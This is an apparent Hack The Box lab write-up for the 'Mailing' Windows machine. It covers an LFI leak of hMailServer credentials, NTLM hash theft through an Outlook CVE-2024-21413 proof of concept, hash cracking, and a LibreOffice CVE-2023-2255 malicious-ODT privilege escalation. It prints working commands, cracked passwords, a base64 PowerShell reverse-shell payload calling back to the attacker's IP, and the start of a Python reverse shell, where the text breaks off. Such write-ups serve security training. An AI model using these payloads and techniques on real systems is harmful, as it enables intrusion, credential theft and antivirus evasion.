Mailing
Hack The Box Machine Writeup
I'm not sure I even know how to mail a letter anymore...
Summary
Mailing was an easy Windows box that could likely have been made medium. It centers around mail services and exploiting an hMailServer as well as loads of enumeration and finding public exploits. There are some cool techniques involved such as stealing an NTLM hash using CVE-2024-21413 and privilege escalation using CVE-2023-2255 and python to evade Windows Defender.
The user section begins with enumerating a website that contains a download function vulnerable to LFI. This can then be used to leak the hmailserver.ini configuration file and get an admin account hash. This hash can be cracked and used to interact with the mail server. Leveraging this new account and CVE-2024-21413 the attacker steals a Maya users NTLM hash which can be cracked and used with evil-winrm to achieve a user shell and grab user.txt
The root step for me was slightly more difficult than the user and involved loads of enumeration and quite a bit of time. It starts by finding a PowerShell script file in the admin users directory that opens all odt files in the Important Documents directory. The attacker also finds that libreoffice is installed and is a version vulnerable to command execution through CVE-2023-2255. Finding a POC for the exploit online, the attacker can generate a malicious ODT file that will run a command when opened. This can then be uploaded to the Important Documents directory and when opened by the administrator user through their PowerShell script, it will result in a reverse shell and completion of the box once a basic defender configuration is bypassed using python.
Un-ironically politicians every 4 years in America
User
Recon
Port Scan With Nmap
I started off with an nmap scan to see what ports are open on the host and what we can interact with. I use -sC to run default NSE enumeration scripts and -sV for version enumeration. Running it with sudo defaults to a stealth -sS scan which is faster than a -sT connect scan which is the default without root permissions.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV 10.129.28.249
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-06 20:04 BST
Nmap scan report for 10.129.28.249
Host is up (0.010s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: NAMESPACE RIGHTS=texkA0001 SORT ACL CHILDREN OK QUOTA completed CAPABILITY IMAP4rev1 IDLE IMAP4
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: NAMESPACE RIGHTS=texkA0001 SORT ACL CHILDREN OK QUOTA completed CAPABILITY IMAP4rev1 IDLE IMAP4
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-06T19:04:30
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.79 seconds
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1
From the scan we can see the standard windows ports, 135,139 and 445 (SMB). There is also a webserver on port 80 with a redirect to mailing.htb which I will add to my /etc/hosts file. Lastly we can see a whole bunch of mail related ports. There are SMTP servers on both the normal 25 but also 465 and 587. Lastly there are some mailbox related ports open such as pop3 on 110 and IMAP on 143 and 993.
Virtual Host Fuzz With Wfuzz
Whenever I have a custom domain like mailing.htb I like to do a brute force fuzzing scan to see if there are any virtual hosts to be discovered. The --hh flag is used to hide default responses based on the Chars length. I can quickly tell anything with a ‘.’ is causing a 400 error so I will also filter based on the 334 response length.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ wfuzz -u http://mailing.htb -H "Host:FUZZ.mailing.htb" -w /opt/useful/SecLists/Discovery/Web-Content/raft-medium-words.txt --hh 4681,334
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://mailing.htb/
Total requests: 63087
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 63087
Filtered Requests: 63087
Requests/sec.: 0
This scan does not find anything of value this time around.
Web Server Enumeration
Up next for basic enumeration is the web site on port 80. There appears to be a single page titled Mailing - The ultimate mail server. There is a mention it is powered by hMailServer, something to check later for public exploits. Lastly, on the bottom of the page there is a button for Download Instructions.
.PNG)
pretty pictures
Clicking the download button gives us instructions.pdf that contains step by step instructions on connecting to mailing.htb mail server.
.PNG)
PDFs when doing CTF machines almost always contain hints or creds
The key information from this PDF seems to be the private ip of the mailing server 192.168.0.105, which seems to share the Vhost of mailing.htb.
.PNG)
Private IP addresses are always useful
At the very bottom there is also a reference to a Maya user, possibly someone we need to send a phishing payload too?
.png)
Never discount the possibility of a phishing attack
At this point I ran a brute force directory scan with Feroxbuster against the site. I added -x asp,aspx since i know it is running on an IIS server from the Nmap scan.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ feroxbuster -u http://mailing.htb/ -w /opt/useful/SecLists/Discovery/Web-Content/raft-medium-words.txt -x asp,aspx -q
404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 42l 159w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 5w 31c http://mailing.htb/download.php
301 GET 2l 10w 160c http://mailing.htb/assets => http://mailing.htb/assets/
200 GET 1144l 5804w 695263c http://mailing.htb/assets/background_image.jpg
200 GET 132l 375w 4681c http://mailing.htb/
200 GET 2932l 17970w 1477653c http://mailing.htb/assets/mayabendito.jpg
200 GET 3l 25w 541c http://mailing.htb/assets/
301 GET 2l 10w 160c http://mailing.htb/Assets => http://mailing.htb/Assets/
200 GET 2485l 15038w 1505848c http://mailing.htb/assets/ruyalonso.jpg
200 GET 17977l 103391w 11149863c http://mailing.htb/assets/johnsmith.jpg
200 GET 3l 25w 541c http://mailing.htb/Assets/
301 GET 2l 10w 166c http://mailing.htb/instructions => http://mailing.htb/instructions/
200 GET 3l 13w 289c http://mailing.htb/instructions/
301 GET 2l 10w 166c http://mailing.htb/Instructions => http://mailing.htb/Instructions/
200 GET 3l 13w 289c http://mailing.htb/Instructions/
Scanning: http://mailing.htb/
Scanning: http://mailing.htb/assets/
Scanning: http://mailing.htb/Assets/
Scanning: http://mailing.htb/instructions/
Scanning: http://mailing.htb/Instructions/
This reveals /instructions which has directory listing and simply shows the instructions.pdf we already downloaded. There is also a download.php which states, No file specified for download. This interests me as a possible LFI vector for later if we can figure out how to pass it a file.
Is that Shaggy from Scobie-Doo?!
LFI To Leak hMailServer.INI
Intercepting the request to download the instructions.pdf file with burp we can see how the download.php endpoint is used.
.PNG)
Time to check for that LFI
HackTricks has a great LFI section from which I pulled some Windows payloads to try out. I was able to confirm that there is LFI present by looking at the windows host file.
.PNG)
No filtering to bypass at all, Ez Pz
Look at Hmail Source
At this point since I had no idea what files to look for. I used the link on the website to go to the hMailServer documentation. From here I found the default install directory.
.PNG)
Checking documentation is a strong habit to build
I also found the folder structure of the application.
.PNG)
Now we are getting somewhere!
I did not find any useful filenames on the documentation (maybe from me not looking hard enough?). As such, at this point I used Google to look for public exploits and other information. When I did I came across hMailServer 4.4.2 - 'PHPWebAdmin' File Inclusion. This mentions a file hMailServer.INI which contains the administrator's password. This seems like a good thing to look for. It does not appear to reside in the default path. As such at this point I threw all the possible folders discovered from the documentation into a list for fuzzing.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ cat path.txt
/Addons
/Bin
/Data
/DBScripts
/Events
/Languages
/Logs
/MySQL
/PHPWebAdmin
/Temp
From here I then sent the LFI request to intruder in burp. Selected the correct fields and attempted to fuzz the directory to find the hMailServer.INI file.
.PNG)
Intruder in BURP free is okay for small lists
I then went to the payloads tab and loaded my list and executed the fuzzing attack.
.PNG)
Nothing, RIP
This did not find the file. Windows also has the Program Files (x86) directory however so I figured I would try that out next.
.PNG)
As offsec would say, Try Harder
This time the attack worked and I found the file in the /Data folder. This config file gives loads of useful information such as the administrator password and the database password.
.PNG)
Got em!
From the exploit we found we can assume the administrator hash is md5 and can throw it in Crackstation. The hash is cracked to homenetworkingadministrator. The exploit also mentions how we can decrypt the database password, we might come back to that later though as it seems to require access to the web admin dashboard.
.PNG)
There is still no patch to the gun zero-day
Stealing NTLM Hash With CVE-2024-21413
Now armed with a user account and password we should be able to connect to the mail server. Following along with the instructions pdf file we downloaded earlier; I install thunderbird and set up an account using the user name administrator an email of [administrator@mailing.htb](mailto:administrator@mailing.htb). The password is the one cracked to homenetworkingadministrator. There does not appear to be anything of use residing in the administrator users mailbox however.
.PNG)
Why you no have mail
Remembering the mention of the Maya user reading the emails from the instructions PDF I next tried to send a phishing email to the maya@mailing.htb account. I started off by simply including a link to a python web server to see if there is a bot that will click it.
.PNG)
When in doubt, go phishing
This did not work however, and at this point I became stuck for a little while trying a bunch of different phishing techniques. At some point however, I remembered this was a Windows box and wondered if I could somehow get the Maya user's NTLM hash through a UNC. Googling around I came across a brand new CVE for Outlook that looked promising: CVE-2024-21413. It mentions NTLM leakage so that sounds like what I am looking for.
I needed something to catch the NTLM authentication so I booted up Responder and then executed the script with the administrator credentials found earlier using \ as the link to create a UNC that will hopefully cause NTLM authentication against my responder SMB server.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.234\test' --subject test
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de
✅ Email sent successfully.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
<...>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.28.249
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:d46f969f15b8bffe:C0C80E34838AD323802D0E39658F0FAC:010100000000000000F89C8C0CA0DA01FADFA10D2F916F8100000000020008004A0038004100530001001E00570049004E002D0049005000500052004D00570041003800520048004E0004003400570049004E002D0049005000500052004D00570041003800520048004E002E004A003800410053002E004C004F00430041004C00030014004A003800410053002E004C004F00430041004C00050014004A003800410053002E004C004F00430041004C000700080000F89C8C0CA0DA01060004000200000008003000300000000000000000000000002000003056A30FBFDF79F2F8D3D32EF8031C01AACFE42D3FB6F7CCB6B5FE3529EF70250A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200330034000000000000000000
This works and after a couple seconds we receive Maya's NTLMv2 hash. Looking at Hashcat example hashes we can see we need to use 5600 as the mode.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
<...>
MAYA::MAILING:dac4fe0aec512cc8:0abf7016c9d7428230e543395441dbcd:010100000000000000ef6f99469eda01293b5f358d9ef4de0000000002000800540058005800340001001e00570049004e002d00380038003200520041004e005000380044004500500004003400570049004e002d00380038003200520041004e00500038004400450050002e0054005800580034002e004c004f00430041004c000300140054005800580034002e004c004f00430041004c000500140054005800580034002e004c004f00430041004c000700080000ef6f99469eda01060004000200000008003000300000000000000000000000002000009be5abac0cb766267616e7031b83c21b57e7a52a6903503167de1974f23e1f3b0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0035000000000000000000:m4y4ngs4ri
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: MAYA::MAILING:dac4fe0aec512cc8:0abf7016c9d7428230e5...000000
Time.Started.....: Mon May 6 22:13:25 2024 (3 secs)
Time.Estimated...: Mon May 6 22:13:28 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1953.3 kH/s (1.67ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5935104/14344385 (41.38%)
Rejected.........: 0/5935104 (0.00%)
Restore.Point....: 5931008/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m6161 -> m3808w
Started: Mon May 6 22:13:09 2024
Stopped: Mon May 6 22:13:29 2024
The hash cracks to m4y4ngs4ri for the Maya account.
Internal penetration tests be like
Shell as Maya
We can confirm the maya:m4y4ngs4ri creds with Crackmapexec. We can also list the shares and see Maya has read access to Important Documents.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ crackmapexec smb 10.129.28.249 -u maya -p m4y4ngs4ri --shares
SMB 10.129.28.249 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.28.249 445 MAILING [+] MAILING\maya:m4y4ngs4ri
SMB 10.129.28.249 445 MAILING [+] Enumerated shares
SMB 10.129.28.249 445 MAILING Share Permissions Remark
SMB 10.129.28.249 445 MAILING ----- ----------- ------
SMB 10.129.28.249 445 MAILING ADMIN$ Admin remota
SMB 10.129.28.249 445 MAILING C$ Recurso predeterminado
SMB 10.129.28.249 445 MAILING Important Documents READ
SMB 10.129.28.249 445 MAILING IPC$ READ IPC remota
We can use the spider module to check what is in the share and discover that it is seemingly empty. using the regex flag with '.' matches everything.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ crackmapexec smb 10.129.28.249 -u maya -p m4y4ngs4ri --spider 'Important Documents' --regex .
SMB 10.129.28.249 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.28.249 445 MAILING [+] MAILING\maya:m4y4ngs4ri
SMB 10.129.28.249 445 MAILING [*] Started spidering
SMB 10.129.28.249 445 MAILING [*] Spidering .
SMB 10.129.28.249 445 MAILING //10.129.28.249/Important Documents/. [dir]
SMB 10.129.28.249 445 MAILING //10.129.28.249/Important Documents/.. [dir]
SMB 10.129.28.249 445 MAILING [*] Done spidering (Completed in 0.06515336036682129)
checking Winrm with the Maya creds we can see that we have achieved code execution by the Pwn3d! message.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ crackmapexec winrm 10.129.28.249 -u maya -p m4y4ngs4ri
SMB 10.129.28.249 5985 MAILING [*] Windows 10.0 Build 19041 (name:MAILING) (domain:MAILING)
HTTP 10.129.28.249 5985 MAILING [*] http://10.129.28.249:5985/wsman
WINRM 10.129.28.249 5985 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
I lastly used evil-winrm to connect to the Mailing machine and obtain a user shell, grabbing user.txt from the desktop.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ evil-winrm -i 10.129.28.249 -u maya -p m4y4ngs4ri
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Desktop> cat user.txt
3c5197ef063ea720bfb0aa98e332eb4b
.jpg)
Danny Diveto is amazing
Root
Enumeration
Manual Recon
Looking around the box it quickly becomes apparent it is in spanish. Checking whoami /all does not reveal any interesting privileges or groups ( at least as far as i can tell since it is in spanish).
*Evil-WinRM* PS C:\Users\maya\documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
Looking in the Maya users documents, there is _mail.py_ and _mail.vbs_. These appear to be the bot commands that allowed us to steal Maya's NTLMv2 hash.
*Evil-WinRM* PS C:\Users\maya\documents> cat "C:/Users/maya/documents/mail.py"
from pywinauto.application import Application
from pywinauto import Desktop
from pywinauto.keyboard import send_keys
from time import sleep
app = Application(backend="uia").connect(title_re="Inbox*")
dlg = app.top_window()
current_count = 0
remove = 2
while True:
try:
unread = dlg.InboxListBox
items = unread.item_count()
if items==1:
sleep(20)
continue
if items != current_count:
for i in range(1,items-current_count-(remove-1)):
if "Yesterday" in unread.texts()[i][0]:
remove = 3
continue
unread[i].select()
message = dlg.child_window(auto_id="RootFocusControl", control_type="Document").Hyperlink.invoke()
sleep(45)
dlg.type_keys("{ENTER}")
unread[i].select()
current_count = items - remove
sleep(20)
except:
pass
*Evil-WinRM* PS C:\Users\maya\documents> cat "C:/Users/maya/documents/mail.vbs"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "explorer shell:AppsFolder\microsoft.windowscommunicationsapps_8wekyb3d8bbwe!microsoft.windowslive.mail"
WScript.Sleep 5000
objShell.AppActivate "Mail"
WScript.Sleep 1000
objShell.SendKeys "{F5}"
WScript.Sleep 500
objShell.SendKeys "{ENTER}"
WScript.Sleep 500
objShell.SendKeys "{TAB}"
WScript.Sleep 500
objShell.SendKeys "{ENTER}"
WScript.Sleep 500
objShell.SendKeys "{ENTER}"
WScript.Sleep 500
objShell.SendKeys "^d"
WScript.Sleep 500
objShell.SendKeys "%{F4}"
Looking at root, there are a couple interesting directories to look through such as the _Important Documents_ which we found to be empty through SMB.
*Evil-WinRM* PS C:\> ls
Directory: C:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2024 5:32 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
d----- 3/9/2024 1:47 PM PHP
d-r--- 3/13/2024 4:49 PM Program Files
d-r--- 3/14/2024 3:24 PM Program Files (x86)
d-r--- 3/3/2024 4:19 PM Users
d----- 4/29/2024 6:58 PM Windows
d----- 4/12/2024 5:54 AM wwwroot
The PHP directory seems to contain a copy of PHP and we are not able to access the wwwroot directory.
Looking at the local listening ports with netstat does not reveal anything of particular note. Listing the installed software we can see python is there which may help us in the future.
*Evil-WinRM* PS C:\users\maya> Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Where-Object {$_.DisplayName -ne $null}
DisplayName DisplayVersion Publisher
----------- -------------- ---------
hMailServer 5.6.8-B2574
Microsoft Edge 124.0.2478.67 Microsoft Corporation
Microsoft Edge Update 1.3.185.29
WebView2 Runtime de Microsoft Edge 124.0.2478.67 Microsoft Corporation
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.32.31326 14.32.31326.0 Microsoft Corporation
Python Launcher 3.12.2150.0 Python Software Foundation
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.32.31326 14.32.31326 Microsoft Corporation
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.32.31326 14.32.31326.0 Microsoft Corporation
Microsoft .NET SDK 8.0.201 (x64) 8.2.124.11405 Microsoft Corporation
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.32.31326 14.32.31326 Microsoft Corporation
Microsoft SQL Server Compact 3.5 ENU
This is not always 100% though so I also checked out the Program Files and Program Files (x86) directories manually. Here LibreOffice stood out right away since it is a windows machine and libreoffice is commonly used on Linux.
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
I also ran a search to look for any powershell script files located on the host. I was able to find _soffice.ps1_ in the localadmin directory.
PS C:\users> Get-ChildItem -Path C:\users\ -Recurse -Filter *.ps1
Get-ChildItem -Path C:\users\ -Recurse -Filter *.ps1
Directory: C:\users\localadmin\Documents\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2024-04-30 4:37 PM 841 soffice.ps1
Looking at this script it becomes clear that the administrator user is opening all ODT files found in "C:\Important Documents" with LibreOffice, furthering my suspicions that LibreOffice is the path to root.
PS C:\users\localadmin\Documents\scripts> type soffice.ps1
# Define the directory containing the .odt files
$directory = "C:\Important Documents\"
# Get all .odt files in the directory
$odtFiles = Get-ChildItem -Path $directory -Filter *.odt
# Loop through each .odt file
foreach ($file in $odtFiles) {
# Start LibreOffice and open the current .odt file
$fileName = $file.FullName
Start-Process "C:\Program Files\LibreOffice\program\soffice.exe" -ArgumentList "--headless --view --norestore", "`"$fileName`""
# Wait for LibreOffice to fully open the document
Start-Sleep -Seconds 5 # Adjust the delay as needed
# Wait for the document to close
Start-Sleep -Seconds 5 # Adjust the delay as needed
Stop-Process -Name "soffice" -force
# Delete the .odt file
Remove-Item -Path $file.FullName -Force
}
Remove-Item 'C:\Important Documents\*' -Recurse -Force
Automatic Enumeration
At this point I brought over Winpeas by uploading it with Evil-Winrm.
*Evil-WinRM* PS C:\users> cd maya
*Evil-WinRM* PS C:\users\maya> upload /home/htb-mp-904224/Desktop/winPEASany.exe
Info: Uploading /home/htb-mp-904224/Desktop/winPEASany.exe to C:\users\maya\winPEASany.exe
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!
However when attempting to run it it appears to be blocked by Windows defender! This makes the escalation step much more difficult.
*Evil-WinRM* PS C:\users\maya> ./winPEASany.exe
Program 'winPEASany.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ ./winPEASany.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./winPEASany.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
There's that hacker guy from the earlier picture!
CVE-2023-2255 LibreOffice exploit
At this point all I had to really work with was the LibreOffice install. I Googled LibreOffice exploits and quickly came upon CVE-2023-2255. Searching for a POC landed me at a Github page by elweth-sec.
It looks like this python script will generate an ODT file for us that will then run a passed command. I guessed that uploading this into the Important Documents would cause the Administrator to open the file and run the command. I first tried with a basic powershell reverse payload. This did not seem to work however.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop/CVE-2023-2255]
└──╼ [★]$ python3 CVE-2023-2255.py --cmd 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAzADQAIgAsADQAMgAwADYAOQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' --output 'exploit.odt'
File exploit.odt has been created !
My first thought was that Defender might be blocking it just as it blocked Winpeas. To get around this I remembered that there was Python installed in the box and thought that Defender was likely only blocking PowerShell and Cmd from executing scripts and not Python. To test this I created a Python reverse shell with revshells and uploaded it to the victim's host.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ cat exploit.py
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
